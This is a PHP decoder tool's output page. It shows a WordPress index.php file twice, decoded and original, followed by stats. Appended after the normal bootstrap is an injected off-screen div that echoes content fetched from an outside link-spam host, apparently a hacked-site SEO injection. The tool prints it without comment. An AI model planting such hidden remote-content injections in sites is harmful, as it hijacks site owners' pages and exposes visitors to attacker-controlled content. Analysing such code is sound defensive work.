Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Front to the WordPress application. This file doesn't do anything, but load..

Decoded Output download

<?php 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require( dirname( __FILE__ ) . '/wp-blog-header.php' ); 
<div style="position: absolute; left: -4168px"> 
<?php echo file_get_contents('http://www.hacklinkseo.net/blok/dost.php'); ?> 
 
</div>

Did this file decode correctly?

Original Code

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
<div style="position: absolute; left: -4168px">
<?php echo file_get_contents('http://www.hacklinkseo.net/blok/dost.php'); ?>

</div>

Function Calls

None

Variables

None

Stats

MD5 9b5a74d5dae11c364e09d119d3c99c73
Eval Count 0
Decode Time 105 ms